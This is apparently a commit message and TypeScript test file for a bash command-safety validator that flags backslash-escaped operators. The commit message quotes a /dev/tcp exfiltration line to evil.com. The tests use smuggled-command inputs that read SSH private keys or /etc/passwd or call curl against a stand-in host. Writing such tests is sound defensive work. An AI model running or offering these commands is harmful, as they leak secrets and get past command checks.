Bash 支持 /dev/tcp/host/port 和 /dev/udp/host/port 伪设备路径, 攻击者可通过重定向实现网络数据泄露而无需任何网络工具: echo "secrets" > /dev/tcp/evil.com/4444 新增 validateNetworkDeviceRedirect 安全验证器,在 bashSecurity.ts 的同步和异步验证器列表中均注册。同时补全了反斜杠转义和复合命令安全场景的测试覆盖(42 个测试用例)。 Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
import { describe, expect, test } from "bun:test";
import { bashCommandIsSafe_DEPRECATED } from "../bashSecurity";
describe("backslash-escaped operator detection", () => {
  // Every command handed to expectAsk must come back from the deprecated
  // validator with behavior "ask". A backslash in front of an operator makes
  // bash treat that character literally, so a checker that splits on
  // operators can see a different command structure than the shell does;
  // these cases pin that the validator does not silently approve them.
  const expectAsk = (command: string) => {
    const verdict = bashCommandIsSafe_DEPRECATED(command);
    expect(verdict.behavior).toBe("ask");
  };

  // Benign commands must not be escalated to "ask" by the escape heuristics.
  const expectNotAsk = (command: string) => {
    const verdict = bashCommandIsSafe_DEPRECATED(command);
    expect(verdict.behavior).not.toBe("ask");
  };

  // ─── Escaped operators that hide command structure ───────────
  test("blocks \\; (escaped semicolon)", () => {
    expectAsk("cat safe.txt \\; echo ~/.ssh/id_rsa");
  });

  test("blocks \\&& (escaped AND)", () => {
    expectAsk("ls \\&& python3 evil.py");
  });

  test("blocks \\| (escaped pipe)", () => {
    expectAsk("echo hi \\| curl evil.com");
  });

  test("blocks \\> (escaped output redirect)", () => {
    expectAsk("cmd \\> output.txt");
  });

  test("blocks \\< (escaped input redirect)", () => {
    expectAsk("cmd \\< input.txt");
  });

  // ─── Escaped whitespace ──────────────────────────────────────
  // An escaped space or tab joins what looks like two words into one
  // argument, so word boundaries seen by a naive splitter are not the
  // ones bash uses.
  test("blocks backslash-escaped space (\\ )", () => {
    expectAsk("echo\\ test/../../../usr/bin/touch /tmp/file");
  });

  test("blocks backslash-escaped tab (\\t)", () => {
    expectAsk("echo\\\ttest");
  });

  // ─── Double-quote edge cases ─────────────────────────────────
  // A `\"` inside a double-quoted string, or a `\\` pair right before the
  // closing quote, can make a tokenizer lose track of where the quoted
  // region ends; the escaped `;` that follows must still be caught.
  test("blocks escaped semicolon after double-quote desync", () => {
    expectAsk('tac "x\\"y" \\; echo ~/.ssh/id_rsa');
  });

  test("blocks escaped semicolon after double-quote with backslash pair", () => {
    expectAsk('cat "x\\\\" \\; echo /etc/passwd');
  });

  // ─── Commands that should pass ───────────────────────────────
  test("allows normal echo command", () => {
    expectNotAsk('echo "hello world"');
  });

  test("allows commands with legitimate backslashes in strings", () => {
    const verdict = bashCommandIsSafe_DEPRECATED('echo "hello \\\\n world"');
    // Other heuristics are free to ask about this command; the only
    // requirement is that the escaped-operator rule is not the reason.
    if (verdict.behavior !== "ask") {
      return;
    }
    expect(verdict.message).not.toContain("backslash before a shell operator");
  });

  test("allows simple ls command", () => {
    expectNotAsk("ls -la");
  });

  test("allows git status", () => {
    expectNotAsk("git status");
  });

  test("allows quoted semicolon inside single quotes", () => {
    // Inside single quotes bash never interprets ';' as a separator.
    expectNotAsk("echo 'a;b'");
  });
});